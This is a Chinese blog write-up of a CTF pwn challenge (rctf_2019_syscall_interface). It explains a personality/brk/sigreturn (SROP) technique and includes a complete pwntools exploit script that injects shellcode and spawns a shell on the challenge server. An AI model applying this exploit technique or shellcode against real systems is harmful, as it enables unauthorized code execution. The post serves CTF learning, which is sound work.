[BUUCTF-pwn] rctf_2019_syscall_interface

最新推荐文章于 2023-04-13 13:59:20 发布
最新推荐文章于 2023-04-13 13:59:20 发布
阅读量302 收藏 1
点赞数 1
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122703428
版权

同样是两口子,差异咋就那么大呢!!!

本来看了exp以为行了。

程序很简单,可以改用户名,可以调用syscall可指定调用号和参1但禁用了55-59的调用不能直接调。

  write(1, "syscall number:", 0xFuLL);
  v2 = read_int();
  if ( v2 > 0x37u && v2 <= 0x3Bu )              // 55-59
    v2 = 60;
  write(1, "argument:", 9uLL);
  v3 = readl();
  v4 = syscall(
         v2,
         v3,
         0xDEADBEEFFFEE1BADLL,
         0xDEADBEEFFFEE1BADLL,
         0xDEADBEEFFFEE1BADLL,
         0xDEADBEEFFFEE1BADLL,
         0xDEADBEEFFFEE1BADLL,
         0xDEADBEEFFFEE1BADLL,
         0xDEADBEEFFFEE1BADLL,
         0xDEADBEEFFFEE1BADLL);
  printf("SYSCALL(0x%x, 0x%lx, ...): RET(0x%lx) by @%s\n", v2, v3, v4, a1);

在执行后会执行个printf这个东西会在heap里把串先组织起来再输出。

这里边用到3个中断调用:

  1. 12 brk()这个调用后会返回heap的尾地址
  2. 15 rt_sigreturn 执行sigreturn可以控制全部的寄存器,通过它读入shellcode然后执行
  3. 135 personality 1参0x400000 可以建一个rwxp的heap段,然后调用brk()可以返回堆地址。

基本步骤:

  1. 先用135建可写可执行段,然后brk得到堆地址,计算出username在堆里的偏移。printf在输出前会将数据在堆里建个缓冲区整理好,这里会残存name(\0会被截断)根据实际情况计算出偏移,当usrname输入shellcode时这个偏移就是程序入口。
  2. gdb在ec8 syscall中断,然后s跟进,进入后查看username到rsp的偏移:120,由于用sigreturn时将rsp作为起点sigreturn 的frame起点应该从rsp开始,这里将数据写到120+16(shellcode16字节)处,应将生成的frame前120+16字节删掉(由于name有长度限制,只取136:136+127的部分)
  3. 在username设置了shell1+frame部分后,再执行brk,利用尾部的printf将shell1写到heap中的固定偏移处。
  4. sigreturn将后续shell2读入heap+0x5000处将从shell1执行,shell1负责跳到shell2执行shellcraft.sh()
from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 25443) 

elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

menu = b"choice:"
def change_name(name):
    p.sendlineafter(menu, b'1')
    p.sendafter(b"username:", name)

def exec_cmd(idx, val):
    p.sendlineafter(menu, b'0')
    p.sendlineafter(b"syscall number:", str(idx).encode())
    p.sendlineafter(b"argument:", str(val).encode())


#0x0000562e421a2000 0x0000562e421c3000 rwxp	[heap]
exec_cmd(135, 0x400000) #personality  READ_IMPLIES_EXEC

exec_cmd(12, 0) #call brk() get heap.end
p.recvuntil(b'RET(')
#https://balsn.tw/ctf_writeup/20190518-rctf2019/#syscall_interface  
heap_addr = int(p.recvuntil(b')', drop=True), 16) -0x22000 #-0x21000  local 0x21000, remote 0x22000
print('heap:', hex(heap_addr))

#chunk0:printf.cache 0x410 

'''
db-peda$ find nobody
Searching for 'nobody' in: None ranges
Found 3 results, display max 3 items:
    pwn : 0x55ea6435cf42 (outs   dx,BYTE PTR ds:[rsi])
 [heap] : 0x55ea6467c040 --> 0xa79646f626f6e ('nobody\n')
[stack] : 0x7fffced33280 --> 0x79646f626f6e ('nobody')
gdb-peda$ vmmap 0x55ea6467c040
Start              End                Perm	Name
0x000055ea6467c000 0x000055ea6469d000 rwxp	[heap]
gdb-peda$ p 0x55ea6467c040 - 0x000055ea6467c000
$1 = 0x40
'''
#username 0120| 0x7ffc73a7f810  -$rsp = 120
shellcode = 'xor rdi,rdi;mov rsi, rsp;syscall;jmp rsi'
rip_heap_offset = 0x40
rip = heap_addr + rip_heap_offset  #printf write shellcode to heap+0x40

frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rdx = 0x1000
frame.rsp = heap_addr + 0x5000
frame.rip = rip
# set cs=0x33, ss=0x2b
frame.csgsfs = (0x002b <<48) | (0x0000 <<32) | (0x0001 <<16) | (0x0033 * 0x1)

payload = asm(shellcode).ljust(16, b'\x90') + flat(frame)[120 + 16:]
change_name(payload[:127])

# leave shellcode on the heap  EF6:printf("...... @%s\n", v2, v3, v4, a1);
exec_cmd(12, 0) #brk()

exec_cmd(15, 0) #rt_sigreturn

p.sendline(asm(shellcraft.sh()))

sleep(0.1)
p.sendline(b'cat /flag')
p.interactive()

坑:

        这个坑不算小,远程建的堆块是0x22000,本地是0x21000。这个没啥道理,不对死活成功不了。看另外一个人写的是0x22000试了果然成功。

石氏是时试
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1521
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 938
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF-PWN-ciscn_2019_n_1
m0_64180167的博客
04-13 307
我们可以使用栈溢出 我们看看 v1函数的地址 是30h 然后是64位的 所以 基地址是8字节。我们发现了system 然后get()函数。所以发现system的地址 开始写exp。发现是64位的 然后 放入ida。我们开始查看 system的地址。发现 cat flag。
[BUUCTF-pwn] rctf2018_stringer
weixin_52640415的博客
01-21 570
当calloc 遇见 mmap 有题有个free明显的UAF,但是建块用的calloc会清0又没有show,就比较麻烦了。 有个edit int sub_E5E() { int result; // eax unsigned int v1; // [rsp+Ch] [rbp-14h] unsigned int v2; // [rsp+10h] [rbp-10h] unsigned int v3; // [rsp+14h] [rbp-Ch] __int64 v4; // [rsp+
BUUCTF-PWN】 ciscn_2019_c_1
qcwwww的博客
05-07 420
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 checksec一下 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除
buuctf|pwn-ciscn_2019_n_5-wp
l2645470582_的博客
11-09 216
1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串,没有看到‘/bin/sh’可以拿到权限类的字符串 3.我们进入main函数看看 我们可以看出gets(text,name)这里造成溢出 我们再去看看name,然后发现name是bss段上的全局变量 又因为该题没有system("/bin/sh")的字样,所以我们可以向bss段写入shellcode拿到权限 shellcode = asm(shellcraft.sh()...
BUUCTF|PWN-pwn1_sctf_2016
Rt1Text的博客
04-23 590
1.checksec+运行 32位+NX保护
[BUUCTF-pwn]——ciscn_2019_ne_5
Y_peak的博客
02-11 384
[BUUCTF-pwn]——ciscn_2019_ne_5 题目地址:https://buuoj.cn/challenges#ciscn_2019_ne_5 checksec下 在IDA中,竟然不给我反汇编,第一次碰到. 查了下解决方法,在反汇编失败的地方,单独反汇编就好. int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // [esp+0h] [ebp-100h] char src[4]
BUUCTF pwn——ciscn_2019_n_1
CNS-Enterprise BCC-1701-J
03-11 278
BUUCTF 做题练习
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
0729信息技术服务知识12.pdf
07-30
0729信息技术服务知识12.pdf
2024贵州省河流水系矢量图层shp数据最新版下载-带python代码
最新发布
07-30
2024贵州省河流水系矢量图层shp数据下载-包含水系线和水系面数据,几千上万条数据,非常细化,附带shp转geojson的python代码
【SCI顶级】鱼鹰算法OOA-CNN-LSTM-Multihead-Attention温度预测【含源码 5769期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Mutilhead-Attention回归预测
【SCI顶级】遗传算法GA-CNN-LSTM-Multihead-Attention温度预测【含源码 5766期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Mutilhead-Attention回归预测
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值